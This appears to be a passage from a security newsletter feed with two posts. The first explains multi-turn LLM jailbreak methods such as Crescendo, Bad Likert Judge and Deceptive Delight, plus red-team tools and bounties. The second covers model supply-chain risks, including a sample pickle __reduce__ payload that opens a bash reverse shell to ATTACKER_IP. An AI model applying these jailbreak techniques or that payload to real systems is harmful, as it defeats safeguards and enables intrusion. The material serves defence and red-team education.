src="https://substackcdn.com/image/fetch/$s_!xuU3!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffcf9e506-e9a3-4903-92d1-7a590201a7c0_1467x672.png" width="1456" height="667" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/fcf9e506-e9a3-4903-92d1-7a590201a7c0_1467x672.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:667,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:55245,&quot;alt&quot;:&quot;toxsec.com jailbreaking llms.&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/194616478?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffcf9e506-e9a3-4903-92d1-7a590201a7c0_1467x672.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="toxsec.com jailbreaking llms." title="toxsec.com jailbreaking llms." srcset="https://substackcdn.com/image/fetch/$s_!xuU3!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffcf9e506-e9a3-4903-92d1-7a590201a7c0_1467x672.png 424w, https://substackcdn.com/image/fetch/$s_!xuU3!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffcf9e506-e9a3-4903-92d1-7a590201a7c0_1467x672.png 848w, https://substackcdn.com/image/fetch/$s_!xuU3!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffcf9e506-e9a3-4903-92d1-7a590201a7c0_1467x672.png 1272w, https://substackcdn.com/image/fetch/$s_!xuU3!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffcf9e506-e9a3-4903-92d1-7a590201a7c0_1467x672.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h3><strong>Multi-turn</strong> </h3><p>The scary one. Everything above is single prompt. Multi-turn spreads the jailbreak across a conversation, and that changes everything.</p><p>Crescendo, published by Microsoft Research, is the textbook version. Start with an innocent question. Reference the model&#8217;s own response in the next turn. Escalate gradually. Five turns in, the model is generating content it would have hard refused if asked directly. Each individual message is clean. The exploit lives in the trajectory. Per message safety checks see nothing wrong.</p><p>Here&#8217;s why this family is terrifying. The model poisons its own context. Each response it generates becomes trusted context for the next turn. When the model wrote a paragraph about some topic three turns ago, that paragraph normalizes the topic for turn four. The attacker never injects anything the filter would flag. The harmful content emerges from the model&#8217;s own incremental cooperation, like boiling a frog one degree at a time.</p><p>The meta has moved past basic Crescendo. Tempest uses tree search to explore multiple escalation paths in parallel, backing off dead ends and pushing through promising branches. Bad Likert Judge, from Palo Alto&#8217;s Unit 42, tricks the model into rating the harmfulness of hypothetical responses on a 1 to 5 scale, then asks for examples at each level. The model generates its own harmful content as &#8220;demonstrations.&#8221; Deceptive Delight embeds the prohibited ask between two benign topics in a positive frame, hitting 65% success rates across eight tested models. Each variant exploits the same root: safety training evaluates individual messages, but the attack is the conversation arc.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!fpQB!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4da3e805-e89b-4240-a2aa-c561c1ec4938_1471x669.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!fpQB!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4da3e805-e89b-4240-a2aa-c561c1ec4938_1471x669.png 424w, https://substackcdn.com/image/fetch/$s_!fpQB!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4da3e805-e89b-4240-a2aa-c561c1ec4938_1471x669.png 848w, https://substackcdn.com/image/fetch/$s_!fpQB!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4da3e805-e89b-4240-a2aa-c561c1ec4938_1471x669.png 1272w, https://substackcdn.com/image/fetch/$s_!fpQB!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4da3e805-e89b-4240-a2aa-c561c1ec4938_1471x669.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!fpQB!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4da3e805-e89b-4240-a2aa-c561c1ec4938_1471x669.png" width="1456" height="662" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/4da3e805-e89b-4240-a2aa-c561c1ec4938_1471x669.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:662,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:57381,&quot;alt&quot;:&quot;toxsec.com jailbreaking llms.&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/194616478?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4da3e805-e89b-4240-a2aa-c561c1ec4938_1471x669.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="toxsec.com jailbreaking llms." title="toxsec.com jailbreaking llms." srcset="https://substackcdn.com/image/fetch/$s_!fpQB!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4da3e805-e89b-4240-a2aa-c561c1ec4938_1471x669.png 424w, https://substackcdn.com/image/fetch/$s_!fpQB!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4da3e805-e89b-4240-a2aa-c561c1ec4938_1471x669.png 848w, https://substackcdn.com/image/fetch/$s_!fpQB!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4da3e805-e89b-4240-a2aa-c561c1ec4938_1471x669.png 1272w, https://substackcdn.com/image/fetch/$s_!fpQB!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4da3e805-e89b-4240-a2aa-c561c1ec4938_1471x669.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>We <a href="https://www.toxsec.com/p/fck-your-guardrails">ran live-fire chains using multi-turn patterns</a> and walked through frontier model defenses in four turns. The Crescendo team&#8217;s Crescendomation tool automates the whole loop with an attacker LLM that adapts in real time. Single turn defenses improve every quarter. Multi-turn attacks route around all of them.</p><h2>The Red Team Toolbox: What Bounty Hunters Actually Load Up</h2><p>Nobody testing Opus 4.7 for bounties is hand typing prompts one at a time. The tooling stack has matured. Here&#8217;s what&#8217;s on the workstation.</p><p><strong>PyRIT</strong>, the Python Risk Identification Tool, is Microsoft&#8217;s open source framework and the de facto standard for orchestrating LLM attack suites. It automates Crescendo, TAP (Tree of Attacks with Pruning), multi-turn red teaming, and single-turn prompt batches. The memory system logs every interaction for later analysis, and the converter architecture lets you chain encoding transforms (Base64, ROT13, Unicode) before the prompt hits the target. PyRIT doesn&#8217;t just send prompts. It reads the model&#8217;s response, scores it, decides whether the jailbreak landed, and adapts the next turn. That&#8217;s the Crescendomation loop, productized.</p><p><strong>Garak</strong> is NVIDIA&#8217;s broad spectrum LLM vulnerability scanner. Think of it as nmap for language models. It ships with probe modules for DAN variants, encoding attacks, prompt injection, and data extraction. Point it at an API endpoint and it runs a sweep. The 2026 version supports agentic probing for multi-turn attack simulation. Garak&#8217;s value is coverage, not depth. You use it to find which families the model is weak against, then switch to PyRIT for the surgical follow up.</p><p><strong>Promptfoo</strong> is the CI/CD play. YAML config, CLI first, plugs into GitHub Actions. You write test cases, including adversarial ones, run them against every model update, and regression test your safety layer the same way you&#8217;d regression test code. 133 built-in plugins mapped to OWASP and MITRE ATLAS. If you&#8217;re an operator shipping models into production, Promptfoo catches the regressions before your users do.</p><p>The workflow: Garak sweeps for the broad attack surface. PyRIT runs the deep, adaptive multi-turn chains against whatever Garak flagged. Promptfoo sits in the pipeline and makes sure patches stay patched. Together, that&#8217;s a complete <a href="https://www.toxsec.com/p/nvidias-ai-kill-chain">kill chain methodology</a> for LLM red teaming.</p><h2>The Mindset, the Bounty, and Why You Should Be Doing This</h2><p>Here&#8217;s the difference between a script kiddie and a red teamer who cashes bounties. The reasoning loop.</p><p>The script kiddie pastes a DAN prompt from GitHub. It fails. They paste the next one. That fails too. They post on Reddit that Claude is &#8220;unbreakable&#8221; and move on.</p><p>The red teamer watches <em>how</em> the model refuses. A refusal that says &#8220;I can&#8217;t help with that&#8221; is different from one that says &#8220;I&#8217;d be happy to help with that in a different context.&#8221; The first is a hard block. The second is a safety classifier making a close call, and close calls are where the attack surface lives. The red teamer reads the refusal, identifies which family the model is weak against, adjusts the framing, and tries again. The prompt is the output. The reasoning loop is the weapon.</p><p>Anthropic knows this. That&#8217;s why they pay for it. The current bug bounty through HackerOne offers up to <strong>$15,000</strong> for a verified universal jailbreak against their Constitutional Classifiers system. Universal means it works across a range of prompts and topics, not just one clever ask. The scope is CBRN and cybersecurity content behind their ASL-3 safeguards. Opus 4.7 just shipped with a brand new cyber classifier layered on top, which means the attack surface is fresh. The bounty hunters who move first have the richest target.</p><p>For context on what&#8217;s possible: Anthropic ran a public Constitutional Classifiers challenge in February 2025. 339 participants, over 300,000 chat interactions across eight levels of CBRN gated questions. Four teams split $55,000. One cracked a universal jailbreak and walked away with $20,000. Another team beat all eight levels using multiple distinct jailbreaks for $10,000. The rest went to borderline universals and alternative bypass paths. Those jailbreaks got patched. The next version of the classifier got harder to break. That&#8217;s the game. You break it, you report it, you get paid, the model gets better, the next attacker has a worse day.</p><h2>The Templates and the Teeth</h2><p>So that&#8217;s the taxonomy, the tooling, and the mindset. You know the five families. You know what&#8217;s dead and what&#8217;s current. You know what to load up and how to think about reading a model&#8217;s refusals.</p><p>Behind the wall, we hand you the red team toolkit. Each family gets a working prompt template with full structure and redacted targets. You&#8217;ll see a modern persona stack layered to survive 2026-era refusal training. Nested virtualization frames deep enough to slip past intent classifiers. A Crescendo sequence annotated turn by turn. Fragment concatenation, encoding chains, and the document frame many-shot variant that flies under length-based detectors.</p><p>Each template comes with the mindset annotation. What we&#8217;re looking for in the model&#8217;s response, how to read partial compliance, and when to pivot families. Plus a walkthrough of recent jailbreaks that had real teeth. Patched now, earned bounties, or walked out the door with 150 gigabytes of stolen data. You can see the architecture and learn from what worked last month. Show the chain, redact the payload. Same as always.</p><blockquote><p>We dropped the free chapters. Now breach the wall for the red team toolkit that actually lands on frontier models.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote>
      <p>
          <a href="https://www.toxsec.com/p/how-to-jailbreak-claude-opus">
              Read more
          </a>
      </p>
   ]]></content:encoded></item><item><title><![CDATA[You Downloaded Gemma 4 from Hugging Face. Is It Safe to Run?]]></title><description><![CDATA[Pickle files, backdoored weights, and sleeper agents turn your privacy win into an attack surface. Gemma 4 security.]]></description><link>https://www.toxsec.com/p/local-model-security-gemma-4</link><guid isPermaLink="false">https://www.toxsec.com/p/local-model-security-gemma-4</guid><dc:creator><![CDATA[ToxSec]]></dc:creator><pubDate>Wed, 15 Apr 2026 14:44:29 GMT</pubDate><enclosure url="https://api.substack.com/feed/podcast/194248729/2526175161851022b5c7f8f4e23ceb11.mp3" length="0" type="audio/mpeg"/><content:encoded><![CDATA[<p><strong>TL;DR:</strong> You downloaded Gemma 4 to keep your data private. Good instinct. But local models solve the privacy problem and create a supply chain problem. You&#8217;re downloading weights from strangers on the internet, running serialization formats that execute arbitrary code, and trusting that nobody poisoned the training data. Safetensors, hash verification, and source vetting are your first line of defense. Here&#8217;s the full threat map.</p><blockquote><p>This is the public feed. Upgrade to see what doesn&#8217;t make it out.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:&quot;button-wrapper&quot;}" data-component-name="ButtonCreateButton"><a class="button primary button-wrapper" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote><h2>Why &#8220;Local Equals Safe&#8221; Is Only Half the Story</h2><p>The pitch is compelling. Run Gemma 4 on your own hardware, or Llama 4, or Qwen 3. No API calls, no cloud provider logging your prompts, no training-on-your-input policies buried in a ToS nobody reads. For regulated industries, local inference is the obvious play for privacy.</p><p>But <strong>privacy and security are different problems</strong>. Privacy means your data doesn&#8217;t leak out. Security means someone else&#8217;s code doesn&#8217;t get in. Every time you download a model from Hugging Face, you&#8217;re pulling weights, configuration files, and serialization artifacts from a public repository where anyone can upload anything. Protect AI&#8217;s scanning partnership with Hugging Face has flagged over 51,700 models with unsafe or suspicious issues across more than 352,000 individual findings. That&#8217;s not a theoretical risk. That&#8217;s the current state of the largest <a href="https://www.toxsec.com/p/vibe-coding-security-attack-chain">open-weight model supply chain</a> in the world.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!_kur!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F88b8345a-1c3f-4d93-b8ac-d32677179e0c_902x1024.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!_kur!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F88b8345a-1c3f-4d93-b8ac-d32677179e0c_902x1024.png 424w, https://substackcdn.com/image/fetch/$s_!_kur!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F88b8345a-1c3f-4d93-b8ac-d32677179e0c_902x1024.png 848w, https://substackcdn.com/image/fetch/$s_!_kur!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F88b8345a-1c3f-4d93-b8ac-d32677179e0c_902x1024.png 1272w, https://substackcdn.com/image/fetch/$s_!_kur!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F88b8345a-1c3f-4d93-b8ac-d32677179e0c_902x1024.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!_kur!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F88b8345a-1c3f-4d93-b8ac-d32677179e0c_902x1024.png" width="468" height="531.2993348115299" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/88b8345a-1c3f-4d93-b8ac-d32677179e0c_902x1024.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1024,&quot;width&quot;:902,&quot;resizeWidth&quot;:468,&quot;bytes&quot;:107211,&quot;alt&quot;:&quot;Local AI model deserialization attack showing torch.load executing a malicious pickle file with no hash verification on an ML research workstation.&quot;,&quot;title&quot;:&quot;Local AI model deserialization attack showing torch.load executing a malicious pickle file with no hash verification on an ML research workstation.&quot;,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/193819061?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffa60d22c-a5ea-4926-ba03-3278c125a4f6_902x1024.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="Local AI model deserialization attack showing torch.load executing a malicious pickle file with no hash verification on an ML research workstation." title="Local AI model deserialization attack showing torch.load executing a malicious pickle file with no hash verification on an ML research workstation." srcset="https://substackcdn.com/image/fetch/$s_!_kur!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F88b8345a-1c3f-4d93-b8ac-d32677179e0c_902x1024.png 424w, https://substackcdn.com/image/fetch/$s_!_kur!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F88b8345a-1c3f-4d93-b8ac-d32677179e0c_902x1024.png 848w, https://substackcdn.com/image/fetch/$s_!_kur!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F88b8345a-1c3f-4d93-b8ac-d32677179e0c_902x1024.png 1272w, https://substackcdn.com/image/fetch/$s_!_kur!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F88b8345a-1c3f-4d93-b8ac-d32677179e0c_902x1024.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>The same trust-but-verify discipline you&#8217;d apply to any dependency from PyPI or npm applies here, except most people skip it entirely because &#8220;it&#8217;s just model weights.&#8221; It isn&#8217;t. If you&#8217;re new to AI security concepts like supply chain attacks and model poisoning, the <a href="https://www.toxsec.com/p/ai-security-101">AI Security 101 primer</a> covers the full landscape.</p><h2>Can a Downloaded Model Hack Your Machine?</h2><p>Yes. And the mechanism is embarrassingly simple.</p><p>Python&#8217;s <code>pickle</code> module is the default serialization format for PyTorch models. Serialization means converting a Python object, your model&#8217;s weights and architecture, into a byte stream that can be saved to disk and loaded later. The problem: pickle doesn&#8217;t just store data. It can execute arbitrary Python code during deserialization, the process of loading that byte stream back into memory. The Python docs have a big red warning about this.</p><p>Here&#8217;s what a malicious pickle payload looks like in practice. JFrog&#8217;s security team found over 100 models on Hugging Face with embedded reverse shells, code that opens a connection back to the attacker&#8217;s server and gives them full command-line access to your machine. The payload hides inside pickle&#8217;s <code>__reduce__</code> method, which Python calls automatically during deserialization. You run <code>torch.load()</code>, the model loads, and a shell opens. You never see it.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;python&quot;,&quot;nodeId&quot;:&quot;c2a884ac-b03f-41c6-84ec-be97fc4d1246&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-python"># What the attacker embeds (simplified)
class Exploit:
    def __reduce__(self):
        return (os.system, (&#8221;bash -i &gt;&amp; /dev/tcp/ATTACKER_IP/4444 0&gt;&amp;1&#8221;,))
</code></pre></div><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!z_Mn!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F55d6b315-a027-4987-87c0-bedcbc5444ce_1119x1070.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!z_Mn!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F55d6b315-a027-4987-87c0-bedcbc5444ce_1119x1070.png 424w, https://substackcdn.com/image/fetch/$s_!z_Mn!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F55d6b315-a027-4987-87c0-bedcbc5444ce_1119x1070.png 848w, https://substackcdn.com/image/fetch/$s_!z_Mn!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F55d6b315-a027-4987-87c0-bedcbc5444ce_1119x1070.png 1272w, https://substackcdn.com/image/fetch/$s_!z_Mn!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F55d6b315-a027-4987-87c0-bedcbc5444ce_1119x1070.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!z_Mn!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F55d6b315-a027-4987-87c0-bedcbc5444ce_1119x1070.png" width="1119" height="1070" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/55d6b315-a027-4987-87c0-bedcbc5444ce_1119x1070.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1070,&quot;width&quot;:1119,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:135084,&quot;alt&quot;:&quot;Reverse shell from malicious AI model pickle payload, attacker exfiltrating HuggingFace tokens and AWS credentials from compromised machine.&quot;,&quot;title&quot;:&quot;Reverse shell from malicious AI model pickle payload, attacker exfiltrating HuggingFace tokens and AWS credentials from compromised machine.&quot;,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/193819061?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F55d6b315-a027-4987-87c0-bedcbc5444ce_1119x1070.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="Reverse shell from malicious AI model pickle payload, attacker exfiltrating HuggingFace tokens and AWS credentials from compromised machine." title="Reverse shell from malicious AI model pickle payload, attacker exfiltrating HuggingFace tokens and AWS credentials from compromised machine." srcset="https://substackcdn.com/image/fetch/$s_!z_Mn!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F55d6b315-a027-4987-87c0-bedcbc5444ce_1119x1070.png 424w, https://substackcdn.com/image/fetch/$s_!z_Mn!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F55d6b315-a027-4987-87c0-bedcbc5444ce_1119x1070.png 848w, https://substackcdn.com/image/fetch/$s_!z_Mn!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F55d6b315-a027-4987-87c0-bedcbc5444ce_1119x1070.png 1272w, https://substackcdn.com/image/fetch/$s_!z_Mn!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F55d6b315-a027-4987-87c0-bedcbc5444ce_1119x1070.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 